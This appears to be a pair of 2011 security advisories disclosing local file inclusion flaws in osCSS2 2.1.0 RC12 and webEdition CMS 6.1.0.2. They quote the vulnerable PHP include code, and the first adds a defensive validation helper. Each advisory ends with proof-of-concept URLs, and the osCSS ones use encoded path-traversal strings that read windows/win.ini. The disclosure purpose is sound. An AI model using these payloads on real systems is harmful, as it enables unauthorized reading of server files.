2011/03/30

osCSS2 2.1.0 RC12 Multiple Local File Inclusion Vulnerabilities

===================================================================
osCSS2 2.1.0 RC12 Multiple Local File Inclusion Vulnerabilities
===================================================================

Software: osCSS2 2.1.0 RC12
Vendor: http://www.oscss.org/
Vuln Type: Local File Inclusion
Download link: http://sourceforge.net/projects/oscss/files%2Foscss-2%2FosCSS 2.1. Final%2FosCSS2_2.1.0_preRC12.zip/download
Author: eidelweiss
contact: eidelweiss[at]windowslive[dot]com
Home: www.eidelweiss.info

Gratz: welcome back YOGYACARDERLINK.web.id !!!


===================================================================

description:
osCSS is a PHP e-commerce shopping program built on a foundation of osCommerce GPL code.
This version brings the script to web standards, using XHTML 1.1 Strict for the markup language and CSS for layout presentation.
----------------------------------
Vulnerability Details:

Some vulnerabilities have been discovered by John Leitch (AutoSec Tools) that can be exploited via the browser (XSS & LFI):

http://www.exploit-db.com/exploits/17069/

http://localhost/oscss2/admin108/index.php?page_admin=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini

http://localhost/oscss2/admin108/popup_image.php?page_admin=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini


-----------------------------------

Here is other vulnerable code I found there:

[!] admin/includes/template/oscss/gabarit-view.php
[!] admin/includes/template/defaut/gabarit-view.php


*/

$css=($_GET['forceview']=='print')? 'print' : 'view' ;
$CHARSET=(isset($_GET['forcecharset']))?$_GET['forcecharset'] : CHARSET ;
@include(DIR_WS_INCLUDES . 'content/'.$page_admin.'.top.inc');
require(DIR_WS_TEMPLATE.'inc/lib.template.php');
?>

-----------------------------------

[!] admin/includes/template/oscss/gabarit-2.php

*/
@include(DIR_WS_INCLUDES . 'content/'.$page_admin.'.top.inc');
require(DIR_WS_TEMPLATE.'inc/lib.template.php');
if (($init_theme=tep_test_gab_ele('inc/init_theme')) !=false) require($init_theme);
?>
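
One way to constrain the `page_admin` value before it reaches the `@include` in the gabarit templates above, shown as an added example (not osCSS code or a vendor fix). `resolve_content_include()` and the demo directory are hypothetical, and the usage comment assumes `page_admin` arrives as a request parameter, as the PoC URLs indicate.

```php
<?php
// Added example, not osCSS code. resolve_content_include() is a hypothetical helper.

/**
 * Map a request-supplied page name to a file inside $contentDir.
 * Returns the canonical path, or null when the value must not be included.
 */
function resolve_content_include(string $contentDir, $pageAdmin, string $suffix = '.top.inc'): ?string
{
    // 1. Accept plain identifiers only: no '/', '\', '.', '%', NUL bytes or arrays.
    if (!is_string($pageAdmin) || !preg_match('/\A[A-Za-z0-9_-]{1,64}\z/', $pageAdmin)) {
        return null;
    }
    // 2. Canonicalise, then confirm the target still sits under the content directory.
    $base = realpath($contentDir);
    $path = realpath($contentDir . DIRECTORY_SEPARATOR . $pageAdmin . $suffix);
    if ($base === false || $path === false) {
        return null; // directory or file does not exist
    }
    $prefix = $base . DIRECTORY_SEPARATOR;
    return strncmp($path, $prefix, strlen($prefix)) === 0 ? $path : null;
}

// Constructed demo: a temporary content directory with one legitimate page.
$dir = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'content_demo_' . getmypid();
mkdir($dir);
$page = $dir . DIRECTORY_SEPARATOR . 'orders.top.inc';
file_put_contents($page, "<?php /* constructed sample page */\n");

// Constructed inputs: a valid name, a traversal string of the kind in the advisory
// (as PHP sees it after URL decoding), a NUL-terminated name, a missing page, an array.
$samples = ['orders', '../../../../windows/win.ini', "orders\0", 'missing', ['orders']];
foreach ($samples as $value) {
    $resolved = resolve_content_include($dir, $value);
    printf("%-36s => %s\n", json_encode($value, JSON_UNESCAPED_SLASHES),
        $resolved === null ? 'rejected' : 'include ' . basename($resolved));
}

unlink($page);
rmdir($dir);

// In the template, the include then becomes (instead of @include on the raw value):
//   $inc = resolve_content_include(DIR_WS_INCLUDES . 'content', $_GET['page_admin'] ?? null);
//   if ($inc !== null) { include $inc; }
```

Only the first sample resolves to a file; the other four are rejected before any filesystem include happens.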

-----------------------------------

exploit & p0c

[!] http://host/path_to_oscss/admin/includes/template/oscss/gabarit-view.php?page_admin=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini
or
[!] http://host/path_to_oscss/admin/includes/template/oscss/gabarit-2.php?page_admin=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini
or
[!] http://host/path_to_oscss/admin/includes/template/defaut/gabarit-view.php?page_admin=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini

====================================================================

Nothing Impossible In This World Even Nobody`s Perfect

===================================================================

==========================| -=[ E0F ]=- |==========================

2011/03/28

webEdition CMS Version 6.1.0.2 (DOCUMENT_ROOT) Local File Inclusion vulnerability

===================================================================
webEdition CMS (DOCUMENT_ROOT) Local File Inclusion vulnerability
===================================================================

Software: webEdition CMS Version 6.1.0.2
Vendor: http://www.webedition.org
Vuln Type: Local File Inclusion
Download link: http://sourceforge.net/projects/webedition/files/webEdition/6.1.0.2/webEdition_6102.tar.gz/download
Author: eidelweiss
contact: eidelweiss[at]windowslive[dot]com
Home: www.eidelweiss.info

Gratz: welcome back YOGYACARDERLINK.web.id !!!

===================================================================

description:
webEdition Version 6.1.0.2

webEdition is a web content management system licensed under the GPL.
For system requirements, installation and upgrade details, see the INSTALL file and the information available on our website:

http://www.webedition.org

See the webEdition/license folder for license information.
See INSTALL for quick installation instructions.
----------------------------------
Vulnerable code:

index.php

/*****************************************************************************
* INITIALIZATION
*****************************************************************************/

include_once($_SERVER["DOCUMENT_ROOT"]."/webEdition/we/include/conf/we_conf.inc.php");
require_once($_SERVER['DOCUMENT_ROOT'] . "/webEdition/we/include/we_message_reporting/we_message_reporting.class.php");

/*****************************************************************************
* INCLUDES
*****************************************************************************/

include_once($_SERVER["DOCUMENT_ROOT"]."/webEdition/we/include/we.inc.php");
include_once($_SERVER["DOCUMENT_ROOT"]."/webEdition/we/include/we_html_tools.inc.php");
include_once($_SERVER["DOCUMENT_ROOT"]."/webEdition/we/include/we_browser_check.inc.php");
include_once($_SERVER["DOCUMENT_ROOT"]."/webEdition/we/include/we_classes/html/we_button.inc.php");
include_once($_SERVER["DOCUMENT_ROOT"]."/webEdition/we/include/we_classes/html/we_htmlElement.inc.php");
include_once($_SERVER["DOCUMENT_ROOT"]."/webEdition/we/include/we_classes/html/we_htmlTable.inc.php");
include_once($_SERVER["DOCUMENT_ROOT"]."/webEdition/we/include/we_language/".$GLOBALS["WE_LANGUAGE"]."/start.inc.php");
include_once($_SERVER["DOCUMENT_ROOT"]."/webEdition/we/include/we_language/".$GLOBALS["WE_LANGUAGE"]."/alert.inc.php");
include_once($_SERVER["DOCUMENT_ROOT"]."/webEdition/we/include/we_language/".$GLOBALS["WE_LANGUAGE"]."/global.inc.php");

$ignore_browser = isset($_REQUEST["ignore_browser"]) && ($_REQUEST["ignore_browser"] === "true");

/*****************************************************************************


----------------------------------

exploit & p0c

[!] http://host/webEdition/index.php?DOCUMENT_ROOT= [lfi]
or
[!] http://host/path_to_webEdition/index.php?DOCUMENT_ROOT= [lfi]

NB: it seems other vulnerabilities are also available, like LFD, XSS, maybe RFI, etc., but I didn't check and test yet.

====================================================================

Nothing Impossible In This World Even Nobody`s Perfect

===================================================================

==========================| -=[ E0F ]=- |==========================